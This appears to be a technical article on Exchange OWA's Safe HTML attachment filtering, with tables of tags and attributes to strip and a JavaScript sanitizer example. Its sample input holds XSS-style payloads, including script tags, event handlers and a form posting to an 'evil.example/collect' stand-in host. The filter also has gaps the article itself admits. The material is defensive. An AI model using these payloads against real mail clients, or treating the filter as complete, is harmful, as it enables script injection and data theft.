When an HTML attachment is opened in OWA, some of its tags and scripts are removed. For example, a secured statement sent as an attachment by a financial institution cannot be opened, or when a link is placed on an image in the message body, the link does not work.
▣ Cause
Exchange's Safe HTML feature removes tags and scripts it considers dangerous.
▒ Solution
In Exchange 2010 SP1, Safe HTML filtering is changed so that it can be controlled from PowerShell, as described below.
Safe HTML Filtering
The Safe HTML filtering feature in earlier Exchange versions can strip parts of certain e-mail attachments when they are downloaded in OWA. Before SP1 this could be avoided by editing web.config to include BypassOwaHTMLAttachmentFiltering and BypassOwaXmlAttachmentFiltering. Service Pack 1 moves the setting to the OWA virtual directory and to the OWA mailbox policy (the ForceSaveAttachmentFilteringEnabled parameter of Set-OwaVirtualDirectory and Set-OwaMailboxPolicy); its default value is False. As long as the attachment's file type is in the Force Save list (ForceSaveFileTypes), no Safe HTML filtering is applied on download. Force Save means the browser saves the file instead of rendering it inside the OWA session, which is why skipping the filter there is acceptable; a type that OWA renders inline should remain filtered rather than being moved to the allowed list.
Building a filtering mechanism on existing infrastructure
When the Web Client requests the body of an object stored in Exchange, it does so by calling EcGetContentFileOp on the OURL interface. The IMail engine then performs an HTML-HTML conversion: potentially changing the HTML language encoding, and parsing and modifying some of the HTML according to previously specified requirements. An example of an existing modification is the conversion of Content-ID references to other MIME parts of the message, denoted by SRC and HREF attributes, into links to body parts accessible via the OURL interface (e.g. an embedded image in MHTML, src="cid:699281317@04061999-23a8", becomes src="./embedded-image1.gif").
The following sections outline security enhancements required to be added in the HTML-HTML conversion process.
HTML Filtering
The tables in the two sections below contain a comprehensive list of HTML elements and attributes that require modification to close security holes. The "Causes" column indicates:
Script: the item may cause harmful script to execute;
Applet: the item may cause harmful Java applets or ActiveX controls to execute;
UI: the item may cause user interface corruption.
Modifying Elements
Many HTML elements may, individually or when combined, cause script and applets to execute, as well as potentially corrupting the OWA user interface.
Note: Many items, such as BASE, PARAM and META, appear within elements that should already be stripped from the HTML body of the message. It may thus be unnecessary to remove these from the body separately.
Elements to filter

| Element | Action | Causes | Reason |
|---|---|---|---|
| HEAD | Remove element, along with all contents to the end of the element | Script | Defines scripts, sounds and styles that may override rendering of the form. |
| HTML | Remove element | UI | May corrupt rendering of the form. |
| BODY | Remove element | UI | May corrupt rendering of the form. |
| PLAINTEXT | Convert to PRE | UI | "Deprecated" by Netscape, "not recommended" by the IE group; HTML 4-level browsers don't properly support this element. Safe to convert to PRE. |
| SCRIPT | Convert to COMMENT; insert "<!--" after the SCRIPT tag, since Netscape doesn't support COMMENT | Script | Allows JScript, JavaScript or VBScript to execute, with the potential to do any kind of damage, since the code runs in the context of an HTML document retrieved from a "safe" web server. |
| BASE | Remove element | UI | Sets the base URL of the document, against which relative links are resolved; BASE may also set the target frame of other links on the page. Generally appears within HEAD. |
| META | Remove element | UI | Used to refresh, redirect, override stylesheets etc., thus corrupting the UI. Generally appears within HEAD. |
| IFRAME | Remove element | Script, Applet, UI | Allows linking of other pages, in safe or unsafe locations, that may contain harmful script or controls, and confuses the user by redirecting UI elements. |
| FRAME, FRAMESET | Remove element | Script, Applet, UI | Allows linking of other pages, in safe or unsafe locations, that may contain harmful script or controls. |
| OBJECT | Remove element | Applet | Allows ActiveX and COM objects to be linked into, and executed from, the context of an HTML document retrieved from a "safe" web server. |
| PARAM | Remove element | Applet | Valid within APPLET, EMBED and OBJECT elements. |
| APPLET | Remove element | Applet | Allows a Java applet to be linked into, and executed from, the context of an HTML document retrieved from a "safe" web server. |
| EMBED | Remove element | Applet | Same as APPLET. |
| EVENT | Convert to COMMENT; insert "<!--" after the EVENT tag, since Netscape doesn't support COMMENT | Script | Registers a script event handler to be executed. |
| ILAYER | Remove element | UI | Navigator-specific. May cause UI redirection or corruption. |
| LAYER | Remove element | UI | Navigator-specific. May cause UI redirection or corruption. |
| LINK | Remove element | Script, Applet, UI | Allows linking of CSS behaviours in IE5 (including the predefined Web Client behaviours), which can perform actions such as PROPPATCH or MOVE based on the styles and other attributes defined in the HTML document. |
Filtering Attributes
Several attributes may contain values that allow script execution or frame redirection (causing corruption of the user interface).
Attribute modification

| Attribute | Action | Causes | Reason |
|---|---|---|---|
| on* | Rename attributes beginning with "on" to "Xon" (e.g. onFocus becomes XonFocus) | Script | on* attributes may be interspersed throughout the HTML markup to add JavaScript event logic that is harmful once the event fires. |
| ACTION, SRC, HREF | Set values whose scheme is JavaScript, VBScript, JScript, LiveScript or PerlScript to blank ("") | Script, Applet, UI | Script placed in an attribute value may (Script) execute when a link is clicked, (Applet) execute when an item loads, or (UI) override the result of the message form. |
| METHOD | Convert value to "GET" | Applet, UI | May be used to override Web Client form submission, allowing message data to be transmitted to an outside source. |
| TARGET | Convert value to TARGET="_BLANK", unless HREF starts with "#" (a local anchor) | UI | Invalid targets may be made to change or simulate the Web Client user interface, or navigate the user to other sites. Explicitly setting TARGET causes links to open in a new browser window. |
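The element table and the attribute table above, together with the cid: rewrite from the HTML-HTML conversion paragraph, can be exercised with the following filter. It is an added example written for this page, not Exchange's Safe HTML code: the tag-level tokenizer, the cidMap argument (the body-part names the web client would assign) and the sample message body are assumptions made for illustration.

```javascript
// Added example (not Exchange's Safe HTML implementation): a tag-level filter that
// applies the element and attribute rules from the two tables above and the
// cid: -> body-part rewrite from the HTML-HTML conversion paragraph. It runs in
// Node without a DOM; cidMap and the sample input are constructed for illustration.

// Elements removed outright (start and end tags). HEAD is also handled earlier so
// that its contents go with it.
const REMOVE_TAGS = new Set(['head', 'html', 'body', 'base', 'meta', 'iframe',
  'frame', 'frameset', 'object', 'param', 'applet', 'embed', 'ilayer', 'layer', 'link']);
// Elements converted to COMMENT with "<!--" inserted after the opening tag.
const COMMENT_TAGS = new Set(['script', 'event']);
// Attributes whose value may carry a script: scheme.
const URL_ATTRS = new Set(['action', 'src', 'href']);
const SCRIPT_SCHEME = /^(javascript|vbscript|jscript|livescript|perlscript):/i;

// One token is a comment, a <!...> declaration, a <?...> instruction, a tag, or a
// bare "<". Quoted attribute values may contain ">", so the tag alternative is
// quote-aware: the filter must see the same tag boundaries the browser will.
const TOKEN_RE =
  /<!--[\s\S]*?-->|<![^>]*>|<\?[^>]*>|<(\/?)([a-z][a-z0-9]*)((?:[^>"']|"[^"]*"|'[^']*')*)>|</gi;
const ATTR_RE = /([^\s=\/"']+)(?:\s*=\s*("[^"]*"|'[^']*'|[^\s>]+))?/g;

function unquote(v) {
  return v !== undefined && /^["']/.test(v) ? v.slice(1, -1) : v;
}

// Rewrite the attribute list of one start tag according to the attribute table.
function filterAttributes(attrText, cidMap) {
  const attrs = [...attrText.matchAll(ATTR_RE)]
    .map(m => ({ name: m[1].toLowerCase(), value: unquote(m[2]) }));
  const href = attrs.find(a => a.name === 'href');
  const out = [];
  for (let { name, value } of attrs) {
    if (name.startsWith('on')) {
      name = 'X' + name;                       // onfocus -> Xonfocus: handler never fires
    } else if (URL_ATTRS.has(name) && value !== undefined) {
      // Whitespace and control characters are dropped before the scheme check,
      // since browsers ignore them in URLs.
      const probe = value.replace(/[\s\u0000-\u001f]/g, '');
      if (SCRIPT_SCHEME.test(probe)) {
        value = '';                            // javascript: and friends -> ""
      } else if (/^cid:/i.test(probe)) {
        // Content-ID reference -> body part served by the web client (assumed map).
        value = cidMap[value.slice(4)] || '';
      }
    } else if (name === 'method') {
      value = 'GET';                           // no POST of message data elsewhere
    } else if (name === 'target') {
      // A local anchor keeps its target; everything else opens a new window.
      value = href && href.value !== undefined && href.value.startsWith('#') ? value : '_blank';
    }
    out.push(value === undefined ? name : `${name}="${value.replace(/"/g, '&quot;')}"`);
  }
  return out.length ? ' ' + out.join(' ') : '';
}

function safeHtml(html, cidMap = {}) {
  // HEAD goes with its contents; PLAINTEXT becomes PRE.
  const s = html.replace(/<head\b[^>]*>[\s\S]*?<\/head\s*>/gi, '')
                .replace(/<plaintext\b/gi, '<pre')
                .replace(/<\/plaintext\s*>/gi, '</pre>');
  return s.replace(TOKEN_RE, (tok, close, name, attrText) => {
    // A "<" that does not start a recognised tag is escaped; comments and
    // declarations are dropped.
    if (name === undefined) return tok === '<' ? '&lt;' : '';
    const tag = name.toLowerCase();
    if (REMOVE_TAGS.has(tag)) return '';
    if (COMMENT_TAGS.has(tag)) {
      // The "-->" before </comment> is this example's addition so the comment is closed.
      return close ? '--></comment>' : '<comment><!--';
    }
    return close ? `</${tag}>` : `<${tag}${filterAttributes(attrText, cidMap)}>`;
  });
}

// Constructed message body exercising each rule, and the cid map the web client
// would build from the message's MIME parts (both made up for this example).
const CID_MAP = { '699281317@04061999-23a8': './embedded-image1.gif' };
const SAMPLE = [
  '<html><head><title>x</title><script>alert(1)</script></head><body>',
  '<p onmouseover="steal()">Statement</p>',
  '<img src="cid:699281317@04061999-23a8" onerror="alert(2)">',
  '<a href="JavaScript:alert(3)" target="_top">pay</a>',
  '<a href="#top" target="_self">top</a>',
  '<form action="http://evil.example/collect" method="POST"><input name="q"></form>',
  '<iframe src="http://evil.example/"></iframe><object data="x"><param name="p">fallback</object>',
  '<script>if (a < b) go()</script>',
  '</body></html>',
].join('\n');

function filteredSample() {
  return safeHtml(SAMPLE, CID_MAP);
}

if (typeof require !== 'undefined' && require.main === module) console.log(filteredSample());
```

Two design points are worth noting. The tokenizer is quote-aware so that the filter sees the same tag boundaries a browser will, which is what stops an attribute value containing ">" from smuggling an on* handler past it, and any "<" that does not begin a recognised tag is escaped rather than passed through. The example does not decode character entities before the scheme check, so a production filter would decode them (or use a real HTML parser) first; and, exactly as the table specifies, an ACTION pointing at an outside host is left alone, since only script schemes are blanked.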